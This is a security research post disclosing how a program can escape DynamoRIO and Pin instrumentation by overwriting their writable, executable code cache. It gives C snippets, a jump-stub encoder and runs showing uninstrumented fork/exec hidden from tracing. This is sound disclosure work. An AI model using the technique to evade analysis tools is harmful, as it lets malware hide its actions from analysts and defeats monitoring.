
Escaping DynamoRIO and Pin - or why it's a worse-than-you-think idea to run untrusted code or to input untrusted data

Before we begin, I want to clarify that both DynamoRIO and Pin are great tools that I use all the time. Dynamic Binary Modification is a very powerful technique in general. However, both implementations have a limitation which can have serious security implications for some use cases and which, as far as I can tell, is not documented in the user manuals. I got in touch with people involved in both projects and they explained that they consider it low risk for the typical usage scenario and that fixing it would add performance overhead. This is a perfectly reasonable position, but I think this sort of low risk / high impact issue should be very well and visibly documented.

Background

It all started after I watched this Black Hat talk on detecting execution under a DBM tool. That's interesting enough, but at the moment it's more or less a trivial problem. Now, escaping from the control of a DBM tool should be more challenging, right? Well, not so much.

How DBM works

The DynamoRIO docs provide a nice, concise explanation. The gist of it is that the DBM tool scans and patches all application code before it executes. It does this by (bit of a simplification) decoding the instruction stream and transforming any position-dependent code into position-independent code. This patched code is stored in a memory location (called the code cache) separate from the original application code. In the end, all code will run from the code cache, but for transparency, things like return addresses and accesses to the Instruction Pointer (IP) register will be translated to make it appear that the application is running from its original location. The basic units are the basic blocks (BBs): instruction sequences which have strictly one entry point and one exit point (any jump, branch or call instruction).

The issue

The first thing I checked when looking for an escape strategy was the permissions of the code cache mapping. To my surprise (but for the practical reasons I described in the first paragraph), both DynamoRIO and Pin map the code cache with read, write and execute permissions. This has at least two security-related implications:

it weakens some anti-exploit techniques of modern systems

it allows any application to easily escape from the control of the DBM tool

Modern systems avoid mapping executable pages as writeable to make it more difficult to write exploits for vulnerable applications where the attacker can write to memory locations outside the intended buffers. Those systems can still be exploited with return oriented programming. However, if executable memory is writeable when running under a DBM system, it might be possible either to directly overwrite the code cache or to reduce the complexity of the required ROP code. I haven't yet investigated this scenario. The rest of this article is about the second issue.

The escape

This is an implementation for x86-64.

At this point we know that there will be some R/W/E mappings in the address space, but not much else. In order to write an exploit, we have to solve several problems:

How to find the address of the code cache, given that ASLR is used?

How to determine which location in the code cache to use? Writing at the wrong place could either crash the process or never be triggered.

How to actually trigger the newly written code? If we simply have the application jump to it, the DBM system will just scan it and maintain control.

The first problem is easy enough to solve on Linux: the kernel exposes all mappings of the calling process in /proc/self/maps. If this feature isn't available, I suspect it's possible to find some references in stale stack data or to probe the address space, but I haven't checked.
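As a minimal sketch of that first step, the following reads /proc/self/maps and reports every mapping that is readable, writable and executable at once. The helper names parse_rwx_line() and list_rwx_mappings() are hypothetical and are not taken from escape.c; the sketch assumes a Linux system and the usual "start-end perms offset dev inode path" line layout.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: parse one line of /proc/self/maps.
 * Returns 1 and fills start/end if the mapping is rwx, 0 otherwise. */
int parse_rwx_line(const char *line, unsigned long *start, unsigned long *end)
{
    char perms[5] = {0};

    /* Expected layout: start-end perms offset dev inode [path] */
    if (sscanf(line, "%lx-%lx %4s", start, end, perms) != 3)
        return 0;
    /* The fourth permission character (p or s) is ignored here. */
    return strncmp(perms, "rwx", 3) == 0;
}

/* Hypothetical helper: print every rwx mapping of the calling process.
 * Returns the number of rwx mappings, or -1 if the file cannot be opened. */
int list_rwx_mappings(void)
{
    char line[512];
    unsigned long start, end;
    int count = 0;
    FILE *maps = fopen("/proc/self/maps", "r");

    if (maps == NULL)
        return -1;
    while (fgets(line, sizeof line, maps) != NULL) {
        if (parse_rwx_line(line, &start, &end)) {
            printf("rwx mapping: %lx-%lx\n", start, end);
            count++;
        }
    }
    fclose(maps);
    return count;
}
```

Calling list_rwx_mappings() from main() in a natively executed program would normally print nothing, while under a DBM tool that maps its code cache R/W/E it should list the candidate regions.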

The last two problems are related. My solution was to first execute some code containing a known and fairly unique pattern that doesn't get translated, for example a 32-bit immediate MOV with a known and valid address. Since I'm a bit lazy, I've decided to code the exploit in C and depend on the compiler to generate the instructions I need, so be warned that a different compiler or different settings might not produce usable results:

char msg[] = "It's a trap!\n";
void trap() {
    printf(msg);
}

The msg array needs to be global, so that the compiler places it in the .data segment and setting the parameter for printf() in trap() gets encoded as a MOV instruction with the full address as an immediate value parameter:

After we have called trap() once, we can search all mappings for occurrences of msg's address (which is encoded in the first MOV instruction above). If we avoid the pages belonging to the application's image and the stack, any matches are going to be copies of this MOV instruction in the code cache, barring any unlucky coincidences.
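The search itself can be sketched as a byte-by-byte scan, since x86 instructions are not aligned and the immediate can start at any offset. The helper find_imm32() below is hypothetical (it is not the code from escape.c) and assumes a little-endian machine, the truncation of msg's address to 32 bits, and a buffer that is readable for its whole length.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: return the offset of the first occurrence of the
 * 32-bit value `needle` (native byte order) in buf at or after `from`,
 * or -1 if there is none. */
long find_imm32(const uint8_t *buf, size_t len, uint32_t needle, size_t from)
{
    if (len < sizeof needle)
        return -1;
    /* Step one byte at a time: the immediate may sit at any offset. */
    for (size_t i = from; i + sizeof needle <= len; i++) {
        if (memcmp(buf + i, &needle, sizeof needle) == 0)
            return (long)i;
    }
    return -1;
}
```

In the setting described above, buf and len would come from one candidate mapping and needle would be (uint32_t)(uintptr_t)msg. Passing the previous match offset plus one as `from` allows collecting every copy rather than just the first.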

Once the location(s) of the MOV instruction in the code cache is/are found, we are free to overwrite it with our shellcode which escapes from the DBM tool's control by jumping directly to a function in the .text segment:
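One way such a jump could be encoded on x86-64, offered as an assumption rather than as the exact shellcode used in escape.c, is a 12-byte stub that loads the absolute target address into RAX and jumps through it. The helper name encode_abs_jump() and the JUMP_STUB_LEN constant are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define JUMP_STUB_LEN 12

/* Hypothetical helper: write `movabs rax, target; jmp rax` into out,
 * which must have room for JUMP_STUB_LEN bytes. Returns the stub length. */
size_t encode_abs_jump(uint8_t *out, uint64_t target)
{
    out[0] = 0x48;                            /* REX.W prefix             */
    out[1] = 0xb8;                            /* mov rax, imm64           */
    memcpy(out + 2, &target, sizeof target);  /* little-endian immediate  */
    out[10] = 0xff;                           /* jmp r/m64                */
    out[11] = 0xe0;                           /* ModRM byte selecting rax */
    return JUMP_STUB_LEN;
}
```

An absolute jump through a register avoids having to compute a relative displacement from an address inside the code cache. The stub clobbers RAX, which is acceptable only if the target function does not expect a meaningful value there.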

escape() is our function which will execute directly, without being scanned or patched by the DBM tool:

void escape() {
    printf("Escaped!\n");
    exit(0);
}

A more complete implementation would remove the signal handlers set up by the DBM system at this point, but this will do for us.

Finally, we can trigger the newly encoded instruction by calling trap() again.

The complete file is available in the same directory as this document with the name escape.c. If we execute the compiled executable directly, we get this output:

$ ./escape
It's a trap!
It's a trap!

However, when executed under DynamoRIO:

$ drrun -- ./escape
It's a trap!
Found at 0x50c2571d
Escaped!

And under Pin:

$ pin -- ./escape
It's a trap!
Found at 0x7f851c6cbe7d
Escaped!

Finally, we should verify that the code in escape() executes directly and not from the code cache. One straightforward way of doing this is by using a system call tracing utility implemented as a Pin or DynamoRIO tool:

The last two system calls are write (1), one with length 13 (It's a trap!\n) and the other one with length 24 (Found at 0x7fe74fbf9e2d\n). Pin didn't detect the two system calls from escape(): write(stdout, "Escaped!\n") and sys_exit, so we have definitely escaped.

There's more

At this point you might be thinking that while this could be a serious issue, it's really obvious if an application has escaped. That's incorrect. The following section describes a way to escape from the DBM tool's control, execute some completely uninstrumented code directly, and then gracefully return to the code cache and under the control of the DBM system which will continue to execute normally.

escape() will now fork and execute uname -s -m in the child process. This isn't something required for this technique to work, it's just an example of operations that could be hidden from the DBM system. We also modify the main function to execute printf("Back to CC\n"); after the second call to trap(), so we know if control is gracefully returned to the DBM system / code cache.
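The fork-and-exec part on its own might look like the sketch below. The function name run_uname() is hypothetical, and waiting for the child is an assumption made here so that the result can be checked; the version in escape.c may be structured differently.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run `uname -s -m` in a child process.
 * Returns the child's exit status, or -1 on failure. */
int run_uname(void)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;                 /* fork failed */
    if (pid == 0) {
        /* Child: replace the process image with uname. */
        execlp("uname", "uname", "-s", "-m", (char *)NULL);
        _exit(127);                /* only reached if exec failed */
    }
    /* Parent: wait so the child's output appears before we continue. */
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```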

Now we are no longer able to overwrite the printf(msg) function call since we want it to execute as expected. Operations on volatile variables are an easy way to convince the compiler to fill some space with dummy code:
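One possible shape for such padding, given as an assumption rather than as the code in escape.c, is a series of stores to a volatile global. Because the variable is volatile, the compiler has to emit every store, and each one typically carries the 32-bit constant as an immediate that can be searched for. The names sink and pad_with_dummy_code() and the constant 0x13371337 are hypothetical.

```c
#include <stdint.h>

/* volatile: the compiler may not drop or merge the stores below. */
volatile uint32_t sink;

/* Hypothetical padding routine: its only purpose is to occupy space in
 * the translated code with instructions that are safe to overwrite. */
void pad_with_dummy_code(void)
{
    sink = 0x13371337u;
    sink = 0x13371337u;
    sink = 0x13371337u;
    sink = 0x13371337u;
}
```

Placing these stores at the start of trap(), before the printf(msg) call, would leave the call itself untouched when the padding is overwritten. How many stores are needed depends on the length of the code being written and on what the compiler generates, so the count of four here is arbitrary.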

Notice the write calls for It's a trap, Found at 0x7f9c8489ee43, the second It's a trap, Back to CC and finally the sys_exit call. Note how there's no trace of write-ing Escaped!, fork-ing or execve, while the system calls executing after that, back under Pin's control, are included and everything else looks normal. Now, let's say you were instrumenting malware for analysis: it would have just sneaked a bunch of stuff including an exec() past you.

I really hope the manuals of DynamoRIO and Pin get updated with a warning about this.